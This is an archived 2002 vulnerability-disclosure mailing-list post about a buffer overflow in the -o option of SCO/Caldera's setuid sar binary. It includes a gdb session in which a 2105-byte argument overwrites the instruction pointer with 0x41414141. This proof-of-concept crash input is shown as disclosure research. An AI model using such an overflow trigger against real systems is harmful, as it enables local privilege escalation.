Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Sar -o exploitation process info.

From: KF <dotslash () snosoft com>
Date: Thu, 09 May 2002 05:29:43 -0400
Caldera recently released an update for the suid sar binary. At one point in time someone pointed out that sar -f had an overflow (Brok Tellier or k2 probably I can't remember). The -f overflow was fixed but the -o option (which I have seen in private security advisorys floating around) also had an overflow but I don't think anyone ever told Caldera / SCO. I haven't gotten around to finishing up the exploit but here are the details for those of you that are interested. 
Sec focus bid: http://online.securityfocus.com/advisories/4089
Caldera fix: ftp://stage.caldera.com/pub/security/openserver/CSSA-2002-SCO.17

Exploit details:

Starting program: //home/kevin//./sar -o  `perl -e 'print "A" x 2104'`
//home/kevin//./sar: Cannot create file
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.l

Program exited with code 01.

Try again with one more char.

(gdb) r -o  `perl -e 'print "A" x 2105'`
Starting program: //home/kevin//./sar -o  `perl -e 'print "A" x 2105'`

Program received signal SIGSEGV, Segmentation fault.
0x80021c2d in getenv ()
(gdb) bt
#0  0x80021c2d in getenv ()
#1  0x8001f2da in _tz_info ()
#2  0x8004e5c2 in tzset ()
#3  0x8004e4ba in _localtime_r ()
#4  0x8001db5f in localtime ()
#5  0x804a124 in memset ()
#6  0x41414141 in ?? ()
Cannot access memory at address 0x41414141.
(gdb) frame 6
#6  0x41414141 in ?? ()
(gdb) i r
eax            0x8001db20       -2147362016
ecx            0x54     84
edx            0x804765c        134510172
ebx            0x0      0
esp            0x80463d4        0x80463d4
ebp            0x41414141       0x41414141
esi            0x804764c        134510156
edi            0x0      0
eip            0x41414141       0x41414141
ps             0x10206  66054
cs             0x17     23
ss             0x1f     31
ds             0x1f     31
es             0x1f     31
fs             0x0      0
gs             0x0      0


-KF
Previous By Date Next
Previous By Thread Next

Current thread: